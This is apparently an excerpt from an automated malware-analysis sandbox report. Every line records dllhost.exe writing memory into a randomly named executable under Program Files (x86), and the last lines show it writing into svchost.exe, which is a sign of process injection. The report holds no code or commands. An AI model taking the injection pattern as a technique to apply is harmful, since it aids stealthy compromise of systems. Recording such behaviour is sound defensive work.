Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
